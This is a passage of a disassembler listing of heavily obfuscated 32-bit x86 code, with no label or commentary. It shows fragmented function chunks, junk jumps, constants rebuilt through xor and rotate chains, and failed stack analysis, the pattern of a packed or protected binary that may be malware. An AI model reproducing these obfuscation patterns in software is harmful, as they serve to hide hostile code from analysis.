; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4440AC: ; CODE XREF: sub_457A66-A264j
jmp loc_440CA8
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
ror ebp, 9
jmp loc_44E003
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4440B9: ; CODE XREF: sub_43AB62:loc_4592FEj
; sub_459111+B48j
pop ecx
jmp loc_43EBB2
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4440BF: ; CODE XREF: sub_44B5CF:loc_4417D6j
jo loc_452A1A
cmp ecx, ebp
jmp loc_4579FE
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_4440CC: ; CODE XREF: sub_44C273:loc_454FBEj
pop ecx
and ecx, 0C6FA1F70h
or ecx, 32D9DECAh
rol ecx, 4
xor ecx, 5A90CEF2h
add ecx, 8B17DA88h
jmp loc_445585
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45775B
loc_4440ED: ; CODE XREF: sub_444029-8990j
; sub_45775B+10j
call sub_44DB1E
mov edx, [ebp-18h]
mov [edx], eax
; END OF FUNCTION CHUNK FOR sub_45775B
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_4440F7: ; CODE XREF: sub_43EDD8+8j
; sub_44A3BB+10j ...
add dword ptr [ebp-18h], 4
inc dword ptr [ebp-20h]
dec dword ptr [ebp-2Ch]
jnz loc_44E09A
jmp loc_455FA7
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
not ebp
jmp sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_444113 proc near ; CODE XREF: ut7h7i2x:0043C117j
; sub_44B526-C075p
xchg eax, [esp+0]
pop eax
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
jmp loc_440F95
sub_444113 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445048
loc_44412A: ; CODE XREF: sub_445048+8j
push 0A56EB8FDh
xchg ebp, [esp+4+var_4]
mov ebx, ebp
pop ebp
add ebx, 102FA680h
test ebx, 200000h
jmp loc_44E905
; END OF FUNCTION CHUNK FOR sub_445048
; ---------------------------------------------------------------------------
loc_444146: ; CODE XREF: ut7h7i2x:loc_439E46j
jnz loc_44D09A
xor eax, eax
mov [ebp-10h], eax
cmp dword ptr [ebp-4], 0
jmp loc_44BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CED
loc_44415A: ; CODE XREF: sub_448CED:loc_457D42j
sub edi, 6F1721F6h
xor edi, 0DF1FBCDFh
add edi, 348238B4h
xor edi, 32AD4B50h
jmp loc_4457B5
; END OF FUNCTION CHUNK FOR sub_448CED
; ---------------------------------------------------------------------------
loc_444177: ; CODE XREF: ut7h7i2x:loc_43EED5j
or edx, 9843F61Bh
sub edx, 66ED3677h
xor edx, 0A0474519h
call sub_44ED9F
push ebp
mov ebp, eax
jmp loc_456328
; ---------------------------------------------------------------------------
sub ebx, ebp
jmp loc_453A11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_301. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44419E: ; CODE XREF: sub_43AA94+11AE4j
jmp sub_43BA59
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
shr esi, 13h
jmp sub_439280
; ---------------------------------------------------------------------------
loc_4441AB: ; CODE XREF: ut7h7i2x:loc_441004j
jl loc_453EF5
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4441B1: ; CODE XREF: sub_447EB5+283j
jmp loc_43F030
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_4441B6: ; CODE XREF: sub_44101A+Dj
jmp loc_45189F
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4441BB: ; CODE XREF: sub_44DD56-1030Aj
jmp loc_4488C3
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
sub edx, ebp
xchg eax, edx
jl loc_4528CA
jmp loc_453EEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_4441CF: ; CODE XREF: sub_43F7A5:loc_442F05j
pop ecx
sub eax, 1A31B5DFh
xor eax, 0E68F9C23h
; END OF FUNCTION CHUNK FOR sub_43F7A5
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_4441DC: ; CODE XREF: sub_449FD5:loc_44FC13j
push offset loc_440FF6
jmp loc_450DFF
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
mov [eax], edi
js loc_44F641
jmp sub_448630
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_4441F3: ; CODE XREF: sub_439170+136DDj
sub eax, esi
pop esi
xor eax, 0E36B5683h
add eax, 0F3EBB8E8h
mov edx, [esp-4+arg_0]
push ebx
mov ebx, eax
jmp loc_457D10
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
push edi
mov edi, esi
xchg edi, [esp]
push 56A71CAAh
pop esi
jmp loc_4550D3
; ---------------------------------------------------------------------------
xor ecx, esi
jmp loc_43D363
; ---------------------------------------------------------------------------
mov ecx, ebx
jmp sub_4490B0
; ---------------------------------------------------------------------------
loc_44422C: ; CODE XREF: ut7h7i2x:loc_448CB7j
add ebx, 0D1F78CB3h
mov [ebx], eax
xchg ebp, [esp]
mov ebx, ebp
pop ebp
push offset loc_458084
jmp locret_445CB2
; ---------------------------------------------------------------------------
push ecx
xor ebp, ecx
jmp sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_44424C: ; CODE XREF: sub_457541:loc_450D9Ej
pop ebp
mov eax, ds:dword_446644
or eax, eax
jnz loc_458C37
jmp loc_4553DE
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D9A8
loc_444260: ; CODE XREF: sub_43D9A8+1Bj
jo loc_44261D
; END OF FUNCTION CHUNK FOR sub_43D9A8
; =============== S U B R O U T I N E =======================================
sub_444266 proc near ; CODE XREF: sub_457836+7p
; FUNCTION CHUNK AT 00444985 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004458CB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BE26 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457DCE SIZE 0000000E BYTES
xchg ecx, [esp+0]
pop ecx
mov ebp, esp
jmp loc_457DCE
sub_444266 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_444271: ; CODE XREF: ut7h7i2x:0043B6D1j
xchg ecx, ebp
; =============== S U B R O U T I N E =======================================
sub_444273 proc near ; CODE XREF: sub_452B14+71D1p
; FUNCTION CHUNK AT 0043B3B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CCA6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D6B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DBCA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E995 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EC8E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004409E5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441BBE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044514E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044619F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004465DE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004471BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447F9B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044872F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00448EF9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449CDF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449EB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE51 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C4F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C935 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F5EF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450A14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004519A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451A33 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00451BA5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451CFC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045202A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452F77 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004546DE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045473F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045603F SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0045704B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458768 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459468 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459677 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A62D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov al, [eax]
jmp loc_459677
sub_444273 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44427E proc near ; CODE XREF: sub_40D06E+40p
; sub_410B0B+2Dp ...
push esi
call sub_43D17F
loc_444284: ; CODE XREF: sub_449B57+Bj
jmp nullsub_52
sub_44427E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_444289: ; CODE XREF: sub_43DCFF+1AB7Dj
mov ecx, esi
and ebp, edx
jg loc_4495B4
xchg edi, [eax]
jmp loc_446E42
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_44429A: ; CODE XREF: sub_45292B-DAFBj
pop ebp
cmp esi, ebp
jmp loc_4583AB
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
loc_4442A2: ; CODE XREF: ut7h7i2x:0043D4C0j
jb loc_45052F
jbe loc_43A3FA
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_4442AE: ; CODE XREF: sub_4464B7:loc_458FE7j
xor eax, 6B156140h
call sub_457C1E
loc_4442B9: ; CODE XREF: sub_44A3BB+1718j
jmp nullsub_369
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
loc_4442BE: ; CODE XREF: ut7h7i2x:0043BC8Cj
sub esi, ecx
shl edi, 0Dh
or ebx, ecx
test edi, eax
jmp loc_453FBD
; =============== S U B R O U T I N E =======================================
sub_4442CC proc near ; CODE XREF: ut7h7i2x:004520BDj
; sub_459B58+6p
; FUNCTION CHUNK AT 00439B98 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F912 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044083A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044256E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044299F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044660C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485AE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449EC6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D64E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044FC4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A82 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00456C17 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00458D2B SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push 48A508DAh
loc_4442D5: ; CODE XREF: ut7h7i2x:loc_443DABj
pop eax
xor eax, 0B20B8CCBh
rol eax, 18h
add eax, 0EE49B498h
jmp loc_43F912
sub_4442CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4442EA: ; CODE XREF: ut7h7i2x:004478B1j
; ut7h7i2x:loc_44D35Cj
xor edx, 0B13A6512h
add edx, 471F69E4h
mov [edx], eax
pop edx
jmp loc_45914B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_4442FE: ; CODE XREF: sub_43AA94:loc_44C33Fj
cmp edx, 6F969E12h
jmp loc_45AB69
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_444309: ; CODE XREF: sub_44C8F3:loc_442243j
mov ecx, eax
xchg ecx, [esp+4+var_4]
call sub_43BA59
mov ds:dword_43A044, eax
cmp ds:dword_43A044, 0
jnz loc_444E70
jmp loc_450BDA
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
loc_44432A: ; CODE XREF: ut7h7i2x:loc_4580CAj
rol edx, 18h
add edx, 1201CD14h
xchg edx, [esp]
; START OF FUNCTION CHUNK FOR sub_445188
loc_444336: ; CODE XREF: sub_445188:loc_4580F3j
jmp loc_43F0C6
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
jb loc_440B7F
jmp sub_454C8C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_554. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4590CF
loc_444347: ; CODE XREF: sub_4590CF+10j
jmp loc_44B932
; END OF FUNCTION CHUNK FOR sub_4590CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_44434C: ; CODE XREF: sub_459E7A-BCE8j
jmp loc_454BE6
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_444351: ; CODE XREF: sub_43FF65+8624j
pushf
jmp loc_44DE87
; END OF FUNCTION CHUNK FOR sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_444358: ; CODE XREF: sub_439B67:loc_45A3E4j
add edx, ebp
add edx, 0B1AF01FFh
mov edx, [edx]
imul byte ptr [edx]
call sub_43AE1A
loc_444369: ; CODE XREF: ut7h7i2x:loc_458BCBj
jz loc_450EAA
jmp loc_4400F3
; END OF FUNCTION CHUNK FOR sub_439B67
; =============== S U B R O U T I N E =======================================
sub_444374 proc near ; CODE XREF: ut7h7i2x:0044F98Bj
; sub_44E5DC:loc_455FD8p
; FUNCTION CHUNK AT 004391BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EF72 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452066 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452430 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004535CF SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004540B9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004546F5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045496F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004552B9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456161 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458455 SIZE 0000001F BYTES
xchg edx, [esp+0]
pop edx
add eax, 0D830BF4Bh
mov eax, [eax]
or eax, eax
jnz loc_4552B9
jmp loc_4391BB
sub_444374 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
jmp sub_44339F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_444393: ; CODE XREF: sub_44602A+118D3j
jz loc_43EBFE
jmp loc_4458C6
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
pushf
jmp sub_4573BA
; ---------------------------------------------------------------------------
loc_4443A4: ; CODE XREF: ut7h7i2x:0044AB87j
rol edi, 15h
mov edx, ebp
loc_4443A9: ; CODE XREF: ut7h7i2x:loc_4522D2j
cmp dword ptr [ebp-108h], 43776569h
jnz loc_446ECA
jmp loc_43D34F
; ---------------------------------------------------------------------------
loc_4443BE: ; CODE XREF: ut7h7i2x:loc_441EC1j
mov [ebp-8], eax
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_4443C1: ; CODE XREF: sub_4396F5+1A691j
jns loc_450621
mov eax, [ebp+var_C]
cmp byte ptr [eax], 0
jnz loc_453D80
loc_4443D3: ; CODE XREF: sub_43CAF4:loc_43A28Dj
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
jmp loc_450618
; END OF FUNCTION CHUNK FOR sub_4396F5
; =============== S U B R O U T I N E =======================================
sub_4443DE proc near ; CODE XREF: sub_444EAA:loc_442EE6p
; FUNCTION CHUNK AT 0044C58B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451BF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532AC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045398D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457CA9 SIZE 0000000E BYTES
xchg edx, [esp+0]
pop edx
push 42454AECh
pop eax
and eax, 85DAFFAEh
xor eax, 6F2A1882h
or eax, 49AE59F1h
jmp loc_451BF7
sub_4443DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4443FF: ; CODE XREF: ut7h7i2x:loc_454D56j
pop esi
or esi, 0A36961E4h
rol esi, 0Ah
xor esi, 0BDAB676Fh
xchg esi, [esp]
jmp loc_43EAA1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_444418: ; CODE XREF: sub_43D021+7804j
jmp loc_44CA1A
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
db 84h, 91h, 24h
dword_444420 dd 0 ; DATA XREF: ut7h7i2x:loc_43B781w
; ut7h7i2x:loc_448107r ...
dword_444424 dd 1A2488E9h, 8C2E1999h ; DATA XREF: sub_452D3D-CEE9o
; sub_44CEC3o
db 63h, 1Bh, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4506D3
loc_44442F: ; CODE XREF: sub_4506D3-2A1Cj
jmp loc_456189
; END OF FUNCTION CHUNK FOR sub_4506D3
; ---------------------------------------------------------------------------
jns loc_443728
push 0CF2021B9h
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_44443F: ; CODE XREF: sub_44D1F0:loc_4542FCj
pop edx
sub edx, 8BF884EDh
jmp loc_43EC62
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_44444B: ; CODE XREF: ut7h7i2x:0044F6EDj
test al, al
jz loc_43FAA2
jmp loc_43B81A
; ---------------------------------------------------------------------------
sub edi, ecx
jmp sub_44696A
; =============== S U B R O U T I N E =======================================
sub_44445F proc near ; CODE XREF: sub_452D3D:loc_443E3Fp
; ut7h7i2x:0044E11Dj
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439512 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004396D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D5B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA3F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FFCC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004400E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440882 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441309 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442527 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004449F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445770 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446607 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449674 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A04C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E7F8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044F318 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FA22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519F2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451DCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453445 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004546CA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455956 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455F5F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004568C7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456B47 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456B93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457A9B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00458D71 SIZE 0000001A BYTES
xchg eax, [esp+8+var_8]
pop eax
mov eax, [esp+4+var_4]
push ebx
push edx
pop ebx
xchg ebx, [esp+8+var_8]
jmp loc_4546CA
sub_44445F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ecx
jmp sub_44B43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_444477: ; CODE XREF: sub_4456F4+5B3j
not edi
cdq
pop edx
mov ebx, eax
loc_44447D: ; CODE XREF: sub_4456F4:loc_43D384j
push ecx
mov ecx, edx
xchg ecx, [esp+0]
push 6D53BCEAh
jmp loc_44538B
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_44448D: ; CODE XREF: sub_4455F4-709Cj
xor esi, 6C5C2480h
or esi, 0ED6800A3h
xor esi, 848FDDDAh
or esi, 955BE12Ah
add esi, 0C991F2h
xchg esi, [esp+4+var_4]
jmp loc_449929
; END OF FUNCTION CHUNK FOR sub_4455F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_451. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448568
loc_4444B4: ; CODE XREF: sub_448568+Dj
jmp sub_4448AF
; END OF FUNCTION CHUNK FOR sub_448568
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_4444B9: ; CODE XREF: sub_43C1E5+CE0Bj
jl loc_441F89
loc_4444BF: ; CODE XREF: ut7h7i2x:0044DDC1j
jmp loc_449A28
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
popf
push esi
jmp loc_441F87
; ---------------------------------------------------------------------------
loc_4444CB: ; CODE XREF: ut7h7i2x:loc_456F3Fj
or eax, edx
push 1C5B3B0Fh
xor ebp, 0A2EE7495h
jmp loc_4525A6
; ---------------------------------------------------------------------------
loc_4444DD: ; CODE XREF: ut7h7i2x:0044E8A0j
cmp edx, ebx
jmp loc_447B5D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_361. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor ecx, 316C3CF2h
jmp sub_44764B
; =============== S U B R O U T I N E =======================================
sub_4444F0 proc near ; CODE XREF: sub_43C1D2+9565p
; ut7h7i2x:00445E78j
xchg edi, [esp+0]
pop edi
mov al, 1
call edx
xor eax, eax
retn
sub_4444F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4444FB: ; CODE XREF: sub_43F1B2+391Aj
jmp nullsub_11
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E70F
loc_444500: ; CODE XREF: sub_44E70F-D921j
jmp loc_43AA35
; END OF FUNCTION CHUNK FOR sub_44E70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_444505: ; CODE XREF: sub_4408C2-5146j
cdq
push 0ED8BD13Bh
ror ebx, 1
loc_44450D: ; CODE XREF: sub_4408C2:loc_441DFEj
lea eax, [ebp-2AAh]
jmp loc_45572D
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_444518: ; CODE XREF: ut7h7i2x:0044DDC8j
jnz loc_43CF99
; =============== S U B R O U T I N E =======================================
sub_44451E proc near ; CODE XREF: sub_44B1E7:loc_44A70Dp
xchg esi, [esp+0]
pop esi
add al, ah
sub_44451E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44871F
loc_444524: ; CODE XREF: sub_44871F+5j
jmp loc_43FF1B
; END OF FUNCTION CHUNK FOR sub_44871F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_444529: ; CODE XREF: sub_459B58-10F92j
popf
mov [ebx], ebp
shl ebx, 0Dh
test eax, 57B9F5D7h
loc_444535: ; CODE XREF: sub_458CD2:loc_4583D5j
jmp loc_441260
; END OF FUNCTION CHUNK FOR sub_459B58
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_314. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FA51
loc_44453B: ; CODE XREF: sub_44FA51+8DD6j
jmp loc_440803
; END OF FUNCTION CHUNK FOR sub_44FA51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_444540: ; CODE XREF: sub_44D5BE+Ej
jmp loc_4573ED
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
loc_444545: ; CODE XREF: ut7h7i2x:00446546j
jmp loc_44F3B0
; ---------------------------------------------------------------------------
jnb loc_44F7C5
jb loc_43E864
jmp sub_453B87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_44455B: ; CODE XREF: sub_439788+145ACj
cdq
loc_44455C: ; CODE XREF: sub_445E13:loc_446EBFj
call sub_4587DD
mov edx, 81424EE7h
call sub_44ED9F
push ebx
mov ebx, eax
jmp loc_455C4E
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_444573: ; CODE XREF: sub_43A556+B768j
call sub_4554BD
loc_444578: ; CODE XREF: sub_44825D:loc_440A2Fj
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_4403D1
jmp loc_43AC48
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44458A: ; CODE XREF: ut7h7i2x:0043B9F3j
pop ecx
; =============== S U B R O U T I N E =======================================
sub_44458B proc near ; CODE XREF: sub_44E6B4-E7B5p
xchg edi, [esp+0]
pop edi
mov ds:dword_41D144, eax
lea eax, nullsub_14
push offset loc_443E69
jmp nullsub_53
sub_44458B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4445A5: ; CODE XREF: sub_449DC4+224Dj
; sub_457A66:loc_44DA6Bj
jbe loc_44C2E2
ja loc_448D4F
jmp loc_44F956
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_4445B6: ; DATA XREF: sub_4543AB+14o
pop edx
jmp loc_43B62B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_4445BC: ; CODE XREF: sub_45633Ej
mov eax, ds:dword_446810
or eax, eax
jnz loc_452BFC
jmp loc_44BA49
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_4445CF: ; CODE XREF: sub_4433C5:loc_43B6C1j
; sub_4433C5-495Fj ...
jmp loc_45222B
; ---------------------------------------------------------------------------
loc_4445D4: ; CODE XREF: sub_4433C5-762Aj
; sub_4433C5+9843j
xchg ebx, [esp-4+arg_0]
mov ecx, ebx
pop ebx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4433C5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4445DC proc near ; CODE XREF: sub_446215-2C5Dj
; ut7h7i2x:00447C2Bp ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C2EA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E953 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004409F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445209 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448428 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A8A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457AB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B4F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458F22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A2A9 SIZE 00000004 BYTES
